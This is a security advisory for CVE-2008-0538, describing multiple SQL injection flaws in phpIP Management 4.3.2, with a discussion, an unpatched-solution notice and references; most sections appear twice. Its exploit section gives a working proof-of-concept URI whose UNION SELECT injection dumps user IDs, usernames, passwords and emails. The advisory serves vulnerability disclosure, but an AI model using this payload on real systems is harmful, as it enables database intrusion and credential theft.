phpIP Management Multiple SQL Injection Vulnerabilities
BID:27468
Info
phpIP Management Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 27468 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-0538 |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 26 2008 12:00AM |
| Updated: | May 07 2015 05:33PM |
| Credit: | Charles Hooper is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
phpIP Management phpIP Management 4.3.2 |
| Not Vulnerable: | |
Discussion
phpIP Management Multiple SQL Injection Vulnerabilities
phpIP Management is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
These issues affect phpIP Management 4.3.2; other versions may also be vulnerable.
phpIP Management is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
These issues affect phpIP Management 4.3.2; other versions may also be vulnerable.
Exploit / POC
phpIP Management Multiple SQL Injection Vulnerabilities
An attacker can exploit these issues via a browser.
The following proof-of-concept URI is available:
http://www.example.com/phpip/display.php?range=view&id=0%20UNION%20SELECT%20null,null,null,null,null,null,uid,username,password,email,null,null,null,null,null,null,null,null,null,null%20%20FROM%20users--&iprange=0&netid=0
An attacker can exploit these issues via a browser.
The following proof-of-concept URI is available:
http://www.example.com/phpip/display.php?range=view&id=0%20UNION%20SELECT%20null,null,null,null,null,null,uid,username,password,email,null,null,null,null,null,null,null,null,null,null%20%20FROM%20users--&iprange=0&netid=0
Solution / Fix
phpIP Management Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
phpIP Management Multiple SQL Injection Vulnerabilities
References:
References:
- phpIP Management Homepage (phpIP Management)